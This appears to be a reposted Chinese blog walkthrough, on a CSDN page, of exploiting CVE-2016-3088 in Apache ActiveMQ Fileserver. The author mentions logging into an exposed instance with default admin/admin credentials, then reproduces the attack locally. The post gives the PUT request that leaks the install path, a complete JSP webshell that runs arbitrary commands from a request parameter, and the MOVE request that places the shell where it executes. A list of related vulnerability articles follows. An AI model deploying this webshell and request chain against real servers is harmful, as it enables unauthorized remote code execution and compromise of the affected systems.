Apache ActiveMQ Fileserver远程代码执行漏洞

最新推荐文章于 2024-01-09 10:39:47 发布
最新推荐文章于 2024-01-09 10:39:47 发布
阅读量155 收藏
点赞数
原文链接:http://www.cnblogs.com/xiaozi/p/7429795.html
版权

  扫端口的时候遇到8161端口,输入admin/admin,成功登陆,之前就看到过相关文章,PUT了一句话上去,但是没有什么效果,于是本地搭建了一个环境,记录一下测试过程。

环境搭建:

ActiveMQ 5.1.0 下载地址:http://activemq.apache.org/activemq-510-release.html

解压后,双击运行abtivemq.bat运行。(进入bin目录,根据自己的操作系统选择win32或win64,5.1.0只有win32目录)

访问8161端口:

漏洞利用:

1、 获取物理路径

PUT /fileserver/%20/%20 HTTP/1.1

2、PUT 一个 Jsp 的 Webshell 到 fileserver 目录

PUT /fileserver/1.jsp HTTP/1.1

 

jsp webshell,可以执行,尝试上传了收集的一些木马,都报错了。。。

<%@ page import="java.io.*"%>
<%
    out.print("Hello</br>");
    String strcmd = request.getParameter("cmd");
    String line =null;
    Process p=Runtime.getRuntime().exec(strcmd);
     InputStream is = p.getInputStream();
      BufferedReader br = new BufferedReader(new InputStreamReader(is));
    while((line =br.readLine())!=null){
        out.print(line+"<br>");
    }
%>

3、利用 MOVE 方法将 Webshell 移入 admin/ 目录

MOVE /fileserver/1.jsp  HTTP/1.0
Destination:file://C:\activemq\webapps\admin\11.jsp

4、成功执行webshell权限

 

最后

欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

 

参考文章:

ActiveMQ安装部署(Windows) http://blog.csdn.net/clj198606061111/article/details/38145597

Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088) https://www.seebug.org/vuldb/ssvid-96268

 

转载于:https://www.cnblogs.com/xiaozi/p/7429795.html

an0708
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2020-11998 —— Apache ActiveMQ 远程代码执行漏洞
战神/calmness的博客
12-10 1202
目录 Apache ActiveMQ 组件介绍 描述 影响版本 过程 修复建议 CVE-2020-11998 | Apache ActiveMQ 远程代码执行漏洞 Apache ActiveMQ 组件介绍 Apache ActiveMQApache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 描述 9月10日Apache软件基金会发布安全公告,修复了Apache Active.
Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088)
maverickpig的博客
07-01 681
Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088) 本文来源于vulhub漏洞库,为本人复现笔记,如有侵权可联系我删除* 该漏洞工作中遇到过几次,记个笔记先 漏洞详情 ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。 fileserver是一个RESTful API接口,我们可
漏洞预警】Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088)
weixin_30629977的博客
10-29 318
漏洞编码:CVE-2016-3088 实验环境:Linux Apache ActiveMQ版本号:Apache ActiveMQ 5.7.0 --------------------------------------------------------------------- 首先下载安装包 wget http://archive.apache.org/dist/activemq...
Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)案例分析
weixin_30432179的博客
09-11 358
部署ActiveMQ运行环境 在linux上部署apache-activemq-5.10.0-bin.tar.gz 通过tar -zxvfapache-activemq-5.10.0-bin.tar.gz解压mq 由于是弱密码,所以可以直接密码登录admin/admin 注意: 如果是密码错误或者不输入密码,则显示如下 输入正确的密码后,通...
Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)分析
07-16 410
1.漏洞背景:ActiveMQApache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 ActiveMQ 的 Web 应用。 2016年4月14日,国外安全研究人员 Simon Zu...
apache-activemq-5.16.5
12-27
JDK是Java程序开发和运行的基础,ActiveMQ作为Java应用程序,依赖于JDK来解析和执行代码。Java 8引入了许多关键改进,包括Lambda表达式、流API和模块系统,这些对于优化ActiveMQ的性能和可维护性至关重要。 ...
apache-activemq-5.16.6-bin.zip
12-26
Apache ActiveMQ是世界上最流行的开源消息代理和队列服务器,它基于Java消息服务(JMS)规范,提供高可用性、可扩展性和强大的消息传递功能。这个"apache-activemq-5.16.6-bin.zip"文件包含了ActiveMQ的最新稳定版本...
apache-activemq-5.17.3
12-27
JDK不仅提供了编译Java代码所需的工具,还包括了Java运行时环境(JRE),使得ActiveMQ这样的Java应用程序能够执行。 当你解压"apache-activemq-5.17.3"压缩包后,你会看到包含以下主要组件和目录: 1. **bin**:...
activemqApache ActiveMQ的镜像
01-31
欢迎使用Apache ActiveMQ Apache ActiveMQ是高性能的Apache 2.0许可的Message Broker和JMS 1.1实现。 入门 为了帮助您入门,请尝试以下链接: 入门 建造 例子 我们欢迎您提供各种帮助,以获取有关如何帮助详细...
activemq-fileserver-5.2.0-sources.jar
03-02
官方版本,亲测可用
Apache ActiveMQ 远程代码执行漏洞分析
最新发布
蚁景网安学院
01-09 1214
Apache ActiveMQ官方发布新版本,修复了一个远程代码执行漏洞,攻击者可构造恶意请求通过Apache ActiveMQ的61616端口发送恶意数据导致远程代码执行,从而完全控制Apache ActiveMQ服务器。
Apache ActiveMQ 远程代码执行漏洞(CVE-2016-3088)复现及排查
dayouzi的博客
08-14 2249
ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。
Apache ActiveMQ 远程代码执行漏洞复现(CNVD-2023-69477)
huangyongkang666的博客
10-31 5606
上周爆出来的activeMQ远程代码执行漏洞,正好做一下漏洞复现,记录一下。
vulhub学习(2) Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)复现
yukinorong的博客
06-24 3177
漏洞环境 配置vulhub , 在目录activemq/CVE-2016-3088中打开docker。 docker中显示 此时开启了两个端口分别为8161和61616 其中61616是工作端口,消息在这个端口进行传递; 8161是网络管理页面端口 访问http://your-ip:8161即可看到网络管理页面,不过这个漏洞理论上是不需要网络的。 利用浏览器进入网络管理页面 进入admin界面,默认密码账号为admin 漏洞原理 ActiveMQ Web控制台分为三个应用程序:admin,api和f
Apache ActiveMQ jolokia 远程代码执行漏洞
时光不老的博客
11-29 2117
漏洞存在于Jolokia服务的请求处理方式中,结合ActiveMQ的配置不当和Java的高级功能,允许已认证的用户通过发送特定格式的HTTP请求来执行危险操作。ActiveMQ的内部配置允许org.jolokia.http.AgentServlet处理来自/api/jolokia的请求,而没有足够的安全检查来防止恶意操作。
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
weixin_44047654的博客
11-25 2997
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
Apache ActiveMQ Fileserver远程代码执行漏洞复现(CVE-2016-3088)
Alluresec的博客
11-20 719
Apache ActiveMQ Fileserver远程代码执行漏洞复现(CVE-2016-3088) 0X00简介 Apache ActiveMQApache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 0X01漏洞概述 ActiveMQ的web控制台分三个应用,分别是admin、api和fi...
ActiveMQ漏洞
公众号shadow sock7
05-11 1212
参考: ActiveMQ漏洞利用方法总结 https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2015-5254/README.zh-cn.md https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2016-3088/README.zh-cn.md https://github.com/Xyntax/POC-T/blob/2.0/script/activemq-weakpass.
activemq 文件服务器,Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现
weixin_39641103的博客
08-06 233
Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现发布时间:2020-09-18 02:56:38来源:脚本之家阅读:123作者:雨中落叶栏目:服务器一、漏洞描述该漏洞出现在fileserver应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值